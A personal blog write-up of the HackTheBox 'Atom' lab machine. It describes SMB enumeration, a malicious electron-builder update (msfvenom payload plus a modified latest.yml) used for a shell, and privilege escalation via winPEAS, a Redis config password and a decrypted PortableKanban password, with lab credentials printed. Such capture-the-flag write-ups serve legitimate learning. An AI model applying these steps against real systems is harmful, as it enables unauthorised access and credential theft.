HackTheBox — ATOM[Medium]

Hey my friends, I’m Adham Makroum, an infosec guy who seeks knowledge, and This my write-up for Atom box.

This box is my first medium box I’ve solved, i wish this write-up be useful for you.

Let’s get started!

Reconnaissance

Nmap Scanning

We have four ports open.

  • port 80: running Apache httpd 2.4.46
  • port 135: running msrpc
  • port: 443: running Apache httpd 2.4.46
  • port 445: running SMB

Gobuster result

But I can’t find anything useful so I will check the smb share

smbclint

I found pdf file called UAT_Testing_Procedures.pdf so I will transfer it to my machine to read it.

After reading pdf file, I noticed the application built with electron-builder , So I searched for any exploitation for electron-builder and I found this Blog.

After reading it, I found this information is very important for my exploitation.

Exploitation

it’s time to exploit.

So I created my payload with msfvenom and passed it to shasum

I modifiedlatest.yml to be like this and replaced path to my payload path and sha512

Now I will transfer it to client1 as mentioned in the pdf file, Run my listener and wait until you get a shell as json and get a user flag

to transfer latest.ymlsmb: \\client1\\> put latest.yml

Privilege Escalation

I transferred winPEAS to a machine and run it.

to transfer winPEAS:

On Kali, in the same directory as winPEASx64.exe

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

On Windows (update the IP address with your Kali IP):

copy \\\\10.10.16.4\\kali\\winPeasx68.exe C:\\Users\\jason\\winPEASx64.exe

Notes From winPEAS result

  • I found the Redis server is running on the target machine so I used HackTricks but we will return to it.
  • There are creds but I think it’s not useful.
  • I found This PortableKanban.exe and it caught my attention.

when I search on PortableKanban I found an exploit for it but we need to EncryptedPassword:”

Now it’s time to Redis server

This means that you need valid credentials to access the Redis instance.

By default Redis can be accessed without credentials. However, it can be configured to support only password, or username + password. It is possible to set a password in redis.conf file.

I search for redis.conf and found it in C:\\Program Files\\Redis\\ and found a password: kidvscat_yes_kidvscat

Now I will use this command to connect to the Redis server and I have got EncryptedPassword Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi

The exploit from exploit DB doesn’t work with me and I don’t know why so I used cyberChef

and password for administrator is kidvscat_admin_@123

I used evil-wram to connect to the machine as Administrator

Great! I’m now an Admin!!!

let's get a root file

Thanks for reading my write-up.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store